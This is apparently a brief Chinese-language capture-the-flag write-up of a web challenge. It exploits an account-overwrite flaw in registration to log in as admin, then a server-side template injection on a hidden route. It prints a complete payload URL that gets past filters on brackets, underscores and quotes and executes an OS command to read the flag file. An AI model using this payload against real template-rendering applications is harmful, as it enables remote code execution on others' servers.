打開頁面提示要使用admin登陸
查找目錄發現了login和register
fuzz發現注冊沒有檢查賬號存在,覆蓋admin然后使用admin登陸
返回首頁發現了提示
admin login success and check the secret route /secret_route_you_do_not_know
我們進入這個頁面,發現
一開始嘗試爆破guess。。然后發現是ssti
過濾了[] __ ",
構造exp: 使用attr繞過__gentitem繞過[]
http://bf35842d-9d46-4d8b-9ad1-0aadefb719fb.node1.hackingfor.fun/secret_route_you_do_not_know?guess={{{}|attr(request.args.t1)|attr(request.args.t2)|attr(request.args.t3)()|attr(request.args.t6)(117)|attr(request.args.t4)|attr(request.args.t5)|attr(request.args.t6)(request.args.t7)|attr(request.args.t6)(request.args.t8)(request.args.t9)}} &t1=__class__ &t2=__base__ &t3=__subclasses__ &t4=__init__ &t5=__globals__ &t6=__getitem__ &t7=__builtins__ &t8=eval &t9=__import__(%22os%22).popen("cat flag.txt").read()
注意:這里的117是__subclasses__里查找的os類,因為0開始,所以是第117個
也可以是以下的類
參考:https://blog.csdn.net/bmth666/article/details/109765055